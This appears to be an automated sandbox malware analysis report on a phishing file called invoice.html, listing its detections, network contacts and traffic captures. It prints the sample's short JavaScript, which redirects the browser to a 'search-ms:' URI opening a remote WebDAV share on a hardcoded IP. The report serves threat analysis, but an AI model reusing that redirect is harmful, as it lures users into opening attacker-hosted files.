Windows Analysis Report
invoice.html

Overview

General Information

Sample name: invoice.html
Analysis ID: 1575919
MD5: ddb1087a289ce03eb1ccc691fae37767
SHA1: ef34f5e6e32c3b3f817f7814d7999d9c68e628b4
SHA256: ce001834ae69247cca8c9d5688739032c6e71503ce7a83bb1f69eeb540265a25
Tags: 154-216-18-69, html, user-JAMESWT_MHT

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
HTML sample is only containing javascript code
Suspicious Javascript code found in HTML file
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 3404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: invoice.html | ReversingLabs: Detection: 21%

Phishing

Source: 0.0.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/invoice.html... This script exhibits high-risk behavior by dynamically constructing a URL with suspicious parameters and redirecting the user to it. The use of the 'search-ms:' protocol and the inclusion of a hardcoded IP address in the URL suggest potential malicious intent, such as a phishing or malware attack.
Source: invoice.html | HTTP Parser: Low number of body elements: 0
Source: invoice.html | HTTP Parser: <script> var url = "search-ms:query=review&crumb=location:\\\\154.216.18.89\&displayname=INVOICES"; window.location.href = url; </script>
Source: invoice.html | HTTP Parser: location.href
Source: invoice.html | HTTP Parser: .location
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 154.216.18.89:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49848 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown | TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown | TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: global traffic | DNS traffic detected: DNS query: www.google.com

System Summary

Source: Name includes: invoice.html | Initial sample: invoice
Source: classification engine | Classification label: mal68.phis.winHTML@27/0@2/5
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Browser Extensions (1) | Process Injection (1) | Process Injection (1) | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Ingress Tool Transfer (1) | Traffic Duplication | Data Destruction |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| invoice.html | 21% | ReversingLabs | Win32.Exploit.Minerva |

No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.google.com | 142.250.181.68 | true | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 154.216.18.89 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true |
| 142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false |

IP
192.168.2.23
192.168.2.6

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575919
Start date and time: 2024-12-16 11:23:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowshtmlcookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: invoice.html
Detection: MAL
Classification: mal68.phis.winHTML@27/0@2/5
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .html
  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 172.217.21.35, 173.194.222.84, 142.250.181.142, 172.217.17.46, 172.217.17.42, 172.217.19.202, 216.58.208.234, 142.250.181.138, 142.250.181.42, 142.250.181.74, 142.250.181.106, 172.217.19.234, 172.217.17.74, 2.22.50.144, 172.217.17.35, 13.107.246.63, 20.190.147.12, 23.218.208.109, 20.223.35.26, 4.175.87.197, 2.16.158.32, 150.171.28.10, 2.16.158.185
  • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, clientservices.googleapis.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
  • Not all processes where analyzed, report is missing behavior information
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: invoice.html
No simulations
                                                • 20.198.118.190
                                                No context
                                                No created / dropped files found
                                                File type: HTML document, ASCII text, with CRLF line terminators
                                                Entropy (8bit): 5.249107209706366
                                                TrID:
                                                • HTML Application (8008/1) 100.00%
                                                File name: invoice.html
                                                File size: 148 bytes
                                                MD5: ddb1087a289ce03eb1ccc691fae37767
                                                SHA1: ef34f5e6e32c3b3f817f7814d7999d9c68e628b4
                                                SHA256: ce001834ae69247cca8c9d5688739032c6e71503ce7a83bb1f69eeb540265a25
                                                SHA512: 8cd14425e7c9f5a7f69161117f5630359344fc820b213b824ed59f9d0da877d7f552436e4224b2a8e276f91c1cc8bff7214ef77d777ccb6a34208c84bcda13ad
                                                SSDEEP: 3:gAdpJi0hXUQPH66YctUQ8LUdpzWjbAdD2H3QOkADFoQXsxGXIb:7vJiaXtYkUapzWjbAdD2H2mmjzb
                                                TLSH: 54C08C824E9A609039B746094A02A2CD26A348670A88DA1AB4C0998914BA35EC56A9C0
                                                File Content Preview: <script>.. var url = "search-ms:query=review&crumb=location:\\\\154.216.18.89\&displayname=INVOICES";.. window.location.href = url;.... </script>
                                                Dec 16, 2024 11:25:06.158591986 CET53502081.1.1.1192.168.2.6
                                                Dec 16, 2024 11:25:13.500967979 CET53526311.1.1.1192.168.2.6
                                                Dec 16, 2024 11:25:32.595489979 CET53570881.1.1.1192.168.2.6
                                                Dec 16, 2024 11:25:53.198525906 CET53562851.1.1.1192.168.2.6
                                                Dec 16, 2024 11:25:55.205641031 CET53573771.1.1.1192.168.2.6
                                                Dec 16, 2024 11:26:25.001621962 CET53573461.1.1.1192.168.2.6
                                                Dec 16, 2024 11:27:10.174650908 CET53651051.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 11:24:57.365577936 CET | 192.168.2.6 | 1.1.1.1 | 0x79ed | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 11:24:57.366003036 CET | 192.168.2.6 | 1.1.1.1 | 0x149f | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 11:24:57.504625082 CET | 1.1.1.1 | 192.168.2.6 | 0x79ed | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 11:24:57.508232117 CET | 1.1.1.1 | 192.168.2.6 | 0x149f | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                                                • tse1.mm.bing.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49760 | 154.216.18.89 | 80 | 3404 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 11:25:05.468977928 CET | 102 | OUT | OPTIONS / HTTP/1.1
                                                Connection: Keep-Alive
                                                User-Agent: DavClnt
                                                translate: f
                                                Host: 154.216.18.89
Dec 16, 2024 11:25:06.767620087 CET | 352 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Mon, 16 Dec 2024 10:25:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: keep-alive
                                                Location: https://154.216.18.89/
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49714 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-16 10:24:51 UTC | 71 | OUT |
                                                Data Ascii: CNT 1 CON 305MS-CV: cGZQzydNx024susR.1Context: a77756c39c1d298c
2024-12-16 10:24:51 UTC | 249 | OUT |
                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:24:51 UTC | 1084 | OUT |
                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cGZQzydNx024susR.2Context: a77756c39c1d298c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:24:51 UTC | 218 | OUT |
                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: cGZQzydNx024susR.3Context: a77756c39c1d298c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:24:52 UTC | 14 | IN |
                                                Data Ascii: 202 1 CON 58
2024-12-16 10:24:52 UTC | 58 | IN |
                                                Data Ascii: MS-CV: QdwK5oln50SY05qjr4QBeQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.6 | 49728 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-16 10:24:57 UTC | 71 | OUT |
                                                Data Ascii: CNT 1 CON 305MS-CV: n5XIVDOmJkuCk2+G.1Context: 5619e79d978b711d
2024-12-16 10:24:57 UTC | 249 | OUT |
                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-16 10:24:57 UTC | 1084 | OUT |
                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: n5XIVDOmJkuCk2+G.2Context: 5619e79d978b711d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
2024-12-16 10:24:57 UTC | 218 | OUT |
                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: n5XIVDOmJkuCk2+G.3Context: 5619e79d978b711d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-16 10:24:58 UTC | 14 | IN |
                                                Data Ascii: 202 1 CON 58
2024-12-16 10:24:58 UTC | 58 | IN |
                                                Data Ascii: MS-CV: htiWQPMNNkaePJaxcDupjg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49761 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-16 10:25:07 UTC | 375 | OUT | GET /th?id=OADD2.10239360265013_1UVY69FM05I7V26BP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
2024-12-16 10:25:07 UTC | 861 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 193575
                                                Content-Type: image/jpeg
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                X-Cache: CONFIG_NOCACHE
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: A7BD2D14ECCD487380480B6D28A09FA3 Ref B: EWR30EDGE1414 Ref C: 2024-12-16T10:25:07Z
                                                Date: Mon, 16 Dec 2024 10:25:07 GMT
                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49762 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-16 10:25:07 UTC | 346 | OUT | GET /th?id=OADD2.10239381718310_196JULM87GXSDC05M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
2024-12-16 10:25:07 UTC | 861 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 514534
                                                Content-Type: image/jpeg
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                X-Cache: CONFIG_NOCACHE
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: A020B937265D4266B016DEC20A1E3BA8 Ref B: EWR30EDGE0111 Ref C: 2024-12-16T10:25:07Z
                                                Date: Mon, 16 Dec 2024 10:25:07 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.6 | 49764 | 150.171.28.10 | 443 | |
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:07 UTC | 346 | OUT | GET /th?id=OADD2.10239360265014_1I9L6MC65FHDFQ9Z7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:07 UTC | 856 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 195935
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: F2E41038E77F444B9F89154D9C9E9C84 Ref B: EWR311000108019 Ref C: 2024-12-16T10:25:07Z
                                                Date: Mon, 16 Dec 2024 10:25:06 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.6 | 49765 | 150.171.28.10 | 443 | |
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:07 UTC | 375 | OUT | GET /th?id=OADD2.10239391107108_1TZ58OTQM3R24HW58&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:07 UTC | 863 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 649123
                                                Content-Type: image/jpeg
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                X-Cache: CONFIG_NOCACHE
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 4171B0F9EF0A4FC7BDC9740A9B9CE677 Ref B: EWR311000108011 Ref C: 2024-12-16T10:25:07Z
                                                Date: Mon, 16 Dec 2024 10:25:06 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.6 | 49763 | 150.171.28.10 | 443 | |
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:07 UTC | 346 | OUT | GET /th?id=OADD2.10239381718311_1O3ACXF8KC2UFP8NW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:07 UTC | 854 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 519739
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 59F9E65B7F784B77B92F301EE619695A Ref B: EWR30EDGE1407 Ref C: 2024-12-16T10:25:07Z
                                                Date: Mon, 16 Dec 2024 10:25:06 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.6 | 49781 | 150.171.28.10 | 443 | |
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:10 UTC | 346 | OUT | GET /th?id=OADD2.10239391107109_1SH77WM6DL1O8ONKY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:10 UTC | 854 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 512189
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 967D17EEA9B8489F8F09E1D7A0473CF2 Ref B: EWR30EDGE1416 Ref C: 2024-12-16T10:25:10Z
                                                Date: Mon, 16 Dec 2024 10:25:10 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.6 | 49782 | 150.171.28.10 | 443 | |
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:10 UTC | 346 | OUT | GET /th?id=OADD2.10239360312917_16ZMDWEI5FV6CL9RM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:10 UTC | 856 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 431666
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 1F2B6E043D614226BEC0F5511962F24B Ref B: EWR311000104053 Ref C: 2024-12-16T10:25:10Z
                                                Date: Mon, 16 Dec 2024 10:25:09 GMT
                                                Connection: close
                                                Data Ascii: R5O}JoY}KO4"^T<Yx>M{Dc>_'skh-{~tV2.};zwO]+-c#7O7s7UiYxB?^I}Q;SE]6^ZhR>n^EiwwhyvxFit
                                                2024-12-16 10:25:11 UTC16384INData Raw: 9f 28 c8 2c 64 b7 d3 e3 44 9b ff 00 db ab be 57 da 34 ff 00 21 26 f3 24 f3 3f 77 e5 7d ff 00 f6 a9 27 8b 6f 99 6b 24 3e 5f ef 3c bf de ff 00 cb 34 ab b7 7e 45 bc d1 bc 13 7d a2 0f f5 71 f9 51 6c f3 12 a5 88 a1 a3 2d a4 50 c4 e9 fb c8 3e 79 3c c9 7f f1 d5 ab ba 35 cc 76 50 f9 de 4f 97 e5 c6 fe 64 7f c1 1e ef ef 56 1c 17 d2 45 0c 9e 7f 93 e5 f9 9e 5c 71 ff 00 cf 3a 9a 3b eb 7b 88 64 b5 4f 26 49 3f d6 7f b1 f2 d2 1c 65 a0 96 b2 c7 17 88 64 f2 21 f2 e0 8f fd 5c 52 ff 00 e8 4f 57 74 98 a7 d5 6e a3 44 9b f7 7f f2 d3 fb f2 56 0e ef ed 0f b7 6a 9e 77 ee 23 ff 00 96 7f fc 4d 64 69 be 25 bf b2 d4 2e 7f b3 a6 ff 00 8f d8 fe cf 27 9b fd c6 a6 d7 35 d2 21 49 45 ea 68 dd 2e ad 16 a1 f6 d9 e6 87 cc f3 3f 77 17 9b 56 e0 96 74 bb b9 ba 8e 1f 2e 49 3f e5 a5 33 5c 9e 4b 88
